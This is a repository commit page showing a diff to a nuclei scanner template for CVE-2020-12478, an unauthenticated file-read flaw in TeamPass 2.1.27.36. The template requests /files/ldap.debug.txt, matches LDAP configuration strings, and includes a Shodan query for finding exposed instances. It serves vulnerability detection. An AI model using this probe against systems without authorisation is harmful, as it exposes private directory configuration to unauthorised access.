daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update CVE-2020-12478.yaml

patch-1
Ritik Chaddha 2022-08-17 16:45:20 +05:30 committed by GitHub
parent 3dce4845b5
commit d909ff8f56
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 13 additions and 12 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

25
cves/2020/CVE-2020-12478.yaml
View File

@ -1,34 +1,35 @@
id: CVE-2020-12478 id: CVE-2020-12478
info: info:
name: TeamPass 2.1.27.36 - Unauthenticated File Access name: TeamPass 2.1.27.36 - Unauthenticated Access
author: arafatansari author: arafatansari
severity: high severity: high
description: | description: |
TeamPass 2.1.27.36 allows an unauthenticated attacker to retrieve files from the TeamPass web root. This may include backups or LDAP debug files. TeamPass 2.1.27.36 allows an unauthenticated attacker to retrieve files from the TeamPass web root. This may include backups or LDAP debug files.
reference: reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-CVE-2020-12478
- https://github.com/nilsteampassnet/TeamPass/issues/2764 - https://github.com/nilsteampassnet/TeamPass/issues/2764
- https://nvd.nist.gov/vuln/detail/CVE-2020-12478
classification:
cve-id: CVE-2020-12478
metadata: metadata:
verified: true
shodan-query: http.html:"teampass" shodan-query: http.html:"teampass"
verified: "true" tags: cve,cve2020,teampass,exposure
tags: file,cve,2020
requests: requests:
- raw: - method: GET
- | path:
GET /files/ldap.debug.txt HTTP/1.1 - "{{BaseURL}}/files/ldap.debug.txt"
Host: {{Hostname}}
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: status
status:
- 200
- type: word - type: word
words: words:
- 'Get all LDAP params' - 'Get all LDAP params'
- 'type' - 'type'
- 'account_suffix' - 'account_suffix'
condition: and condition: and
- type: status
status:
- 200